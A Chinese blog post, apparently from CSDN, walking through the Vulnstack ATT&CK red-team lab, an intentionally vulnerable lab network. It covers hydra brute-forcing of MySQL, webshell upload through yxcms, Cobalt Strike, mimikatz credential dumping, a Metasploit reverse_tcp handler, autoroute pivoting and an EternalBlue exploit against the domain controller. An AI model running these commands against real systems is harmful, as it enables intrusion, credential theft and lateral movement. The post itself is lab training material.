01 ATT&CK红队靶场

最新推荐文章于 2024-04-21 16:25:54 发布
最新推荐文章于 2024-04-21 16:25:54 发布
阅读量312 收藏
点赞数
分类专栏: 后渗透内网提权 文章标签: php linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/116996845
版权

靶场搭建

下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

靶场环境

系统配置
win7网络适配器(桥接)192.168.218.128和网络适配器2(nat)192.168.52.143
win03网络适配器(桥接)192.168.52.141
win08网络适配器(桥接)192.168.52.138
kali网络适配器(nat)192.168.218.129

外网拿权限

信息收集

使用kali扫描192.168.218.128(win7)也就是web服务器的IP地址
在这里插入图片描述
发现80和3306端口开启,那么访问80然后扫描目录和爆破3306账号密码
在这里插入图片描述

hydra -L /home/kali/dic_username_mysql.txt -P /home/kali/dic_password_mysql.txt 192.168.218.128 mysql

扫描到的目录:
/phpmyadmin
/l.php
/beifen.rar
/yxcms
/phpinfo.php
3306爆破结果:
login: root
password: root

getshell方式

phpmyadmin日志写shell

点击跳转

yxcms写shell

默认账号密码为admin/123456

默认后台地址:http://192.168.218.128/yxcms//index.php?r=admin

写shell的位置登陆后台 — 前台模板 — 管理模板文件 — index_index.php
在这里插入图片描述
由于这里没有返回文件的路径,但是我们下载上面的备份文件,来找到index_index.php然后连接蚁剑
在这里插入图片描述
这里是一个管理员的权限

提权方式

CS上线提权

cs上线生成exe文件
上传exe然后在蚁剑中执行
在这里插入图片描述
打开cs可以看到该机器已经上线了
在这里插入图片描述
查看IP信息
在这里插入图片描述
查看域信息
在这里插入图片描述
systeminfo查看系统信息
在这里插入图片描述
运行mimikatz获取明文的账号和密码
在这里插入图片描述
CS提权
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
已经提权成功,拿到了system

内网信息收集

域信息收集

DNS服务器名:god.org
域:owa.god.org
域控:owa(192.168.52.138)
域内的主机:owa、ROOT-TVI862UBEHSTU1
win7:192.168.52.143

内网横向移动

SMB Beacon

因为kali无法直接访问内网的地址,所以需要CS派生smb beacon,让内网的主机连接到win7上。
.
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。

新建监听
在这里插入图片描述
增加会话
在这里插入图片描述
选择新生成的监听
在这里插入图片描述

cs反弹shell给msf

配置监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.218.129
msf5 exploit(multi/handler) > set lport 12345
msf5 exploit(multi/handler) > exploit

设置监听与msf相同,然后增加会话
在这里插入图片描述
配置静态路由

meterpreter > run get_local_subnets   				#查看网段/子网
meterpreter > run autoroute -s 192.168.52.0/24   	#添加路由
meterpreter > run autoroute -p  					#查看路由
meterpreter > background   							#转入后台运行

探测IP和端口

msf6 exploit(multi/handler) > back										#返回
msf6 > use auxiliary/scanner/netbios/nbname								#设置模块
msf6 auxiliary(scanner/netbios/nbname) > set rhosts 192.168.52-255		#扫描IP
msf6 auxiliary(scanner/netbios/nbname) > run							#执行

对扫描到的IP探测端口,发现开放445端口

域内存活IP192.168.52.141192.168.52.138
探测端口:use auxiliary/scanner/portscan/tcp

发现域内的两台机器都存在永恒之蓝

是否存在永恒之蓝:use auxiliary/scanner/smb/smb_ms17_010

永恒之蓝

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhosts 192.168.52.138
msf6 > run

记录踩的坑

mysql无法远程访问:https://blog.csdn.net/qq_36358636/article/details/94673312
p_utao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ATT&CK红队评估实战靶场-1(全网最细)
lwwzyy
12-20 3988
声明:该系列文章首发于公众号:纁玄安全,转载请注明出处!本公众号所分享内容仅用于网安爱好者之间的技术讨论,所有渗透及工具的使用都需获取授权,禁止用于违法途径,否则需自行承担,本公众号及作者不承担相应的后果。 ATT&CK红队评估实战靶场-1 目录: 1. 环境配置 插播一点网络配置的姿势 2. 实战 2.1 信息收集 2.2 web站点探测 2.3 getshell 3 漏洞 3.1 目录遍历漏洞 3.2 存储型XSS 4. ..
【红日靶场系列】ATT&CK红队评估1
weixin_45632448的博客
07-06 2867
内网渗透学习过程,简单记录一下靶场下载地址: 今天做的是第一个ATT&CK实战系列——红队实战(一)下载下来之后一共有三个虚拟机,解压到虚拟机目录下 分别对应的是Windows7,Windows Server 2003和Windows Server 2008。另外我们还需要一台攻击机,这里选用的是kali2022.1(其实真实环境自己主机就相当于攻击机),网络拓扑图如下所示: 靶场提供的三个主机在同一个网段中,另外Win7主机有两张网卡,模拟可以与外网进行通信的主机,且安装有phpstudy,部署了we
ATT&CK红队评估-1
rlenew的博客
02-23 4496
首先配置环境 VMware虚拟机下载就不多赘述了,网上有很多教程,这里主要说明一下靶机拓扑和如何配置虚拟网络的过程。 首先下载包中的VM1为win7,VM2为win2003,VM3为win2008,拓扑图为下图所示: 由于要营造一个内网环境,因此需要将虚拟机与外网隔绝,再VMware中可以通过虚拟机设置中的网络适配器来设置,将其自定义成特定虚拟网络, 对网络连接模式不清楚的小伙伴可以细读一下这...
Program Files\ZKTeco\Att.exe
01-27
考勤系统
靶场系列】01 ATT&CK红队评估
最新发布
qq_41169485的博客
04-21 1563
为web服务器,应设置为双网卡主机,其中NAT网卡与攻击机相连,VMnet1网卡与其他两台靶机相连 (图中设置错误,应设置网络适配器1为VMnet1)发现l.php探针和phpmyadmin目录,访问探针,暴露了该服务器使用的是phpstudy,所以猜测mysql账号密码为。为了保持会话,我们把后门注入到一个正常的程序里,但又不能影响程序运行,这里选择Everything.exe。VMnet1网卡为仅主机模式,设置IP段为192.168.52.0,确保三台主机均可以相互ping通。
ATT&CK手册(修改版)
09-16
**ATT&CK手册(修改版)** ATT&CK(Adversarial Tactics, Techniques & Common Knowledge)是由美国非营利组织MITRE Corporation开发的一种框架,用于描述和分类网络攻击者的行为战术、技术和过程(TTPs)。这个框架...
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
ATT&CK.红队战术漫谈.pdf
09-09
ATT&CK.红队战术漫谈
ATT&CK手册.pdf
09-20
ATT&CK手册.pdf
内网渗透——红日靶机学习(一)
jammny
11-13 6216
前言 开启内网学习,域渗透之路... 环境搭建 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 内网拓扑: 我选用wmware ESXI进行内网环境搭建,内网搭建如下: WIN7(web服务器):172.26.16.123/192.168.52.143 WIN2008(域控):192.168.52.138 WIN2003(域成员):192.168.52.141 渗透测试 一、外网打点 信息收..
ATT&CK红队评估实战靶场(一)
qq_53263789的博客
05-16 636
写在前面的话 第一次尝试这种渗透靶场,还是在考试的三天中完成的,会接着进行其他的靶场(真是又菜又爱玩) 靶场地址:vulunstack 靶场搭建 Win7:密码: cys121` 外网192.168.47.132 内网 192.168.52.143 Win2008 密码:cys121` 内网 192.168.52.138 Win2003 密码:cys121` 内网 192.168.52.141 经过互相ping 内网三台机器可以互相ping通 Kali 外网 192.168.
完全模拟ATT&CK实战靶场之七
tangshuangsss的专栏
04-28 654
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本...
多种姿势抓取windows系统的hash值
p_utao的博客
09-12 4957
hashdump抓取密码 从目标机中提取hash值,破解hash值就可获得账号密码,计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要访问就必须有系统级账号,所以要使用该命令就必须进行权限提升 在shell提示符下输入hashdump命令,将导出目标机sam数据库中的hash meterpreter > hashdump Administrator:500:44efce164ab921caaad3b435b5140
后渗透之各种维持权限的后门原理即利用
p_utao的博客
09-13 3562
前言 在拿到最高权限后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复了,还可以通过后门继续控制目标系统。 后门简单来说就是一个留在目标主机上的系统,它可以使攻击者随时连接到目标主机,大多数情况下,后门是一个运行在目标主机上的隐藏进程,它允许一个普通的、未授权的用户控制计算机。 操作系统后门 后门泛指绕过目标系统安全控制体系的正规用户认证过程,从而维持我们对目标系统的控制权,以及隐匿控制行为的方法。Meterpreter提供 了Persis
Samba远程Shell命令注入执行漏洞(CVE-2007-2447)
p_utao的博客
09-02 2955
产生原因 传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行 实验环境 这里使用的目标机是metasploitable2 linux攻击机:192.168.43.113 linux目标机:192.168.43.23 利用攻击 首先对目标机进行扫描,收集可用的服务信息,使用nmap扫描查看系统开放端口和相关的应用程序 msf5 > nmap -sV 192.168.43.23 [*] exec: nmap -sV 192.16
msf之后渗透(笔记)
p_utao的博客
09-14 2446
后渗透攻击:信息收集 Metasploit提供了一个强大的后渗透工具——Meterpreter后期渗透模块有200多个。 Meterpreter优势: - 纯内存工作模式,不需要对磁盘进行任何写入操作 - 使用加密通信协议,可以同时与几个信道通信 - 在被攻击进程内工作,不需要创建新的进程 - 易于在多进程之间迁移 - 平台通用 进程迁移 获得shell时,该shell是极其脆弱,所以需要移动这个shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作,这样使渗透更
ATT\\\\&CK红队评估实战靶场
08-16
ATT&CK红队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的红日靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值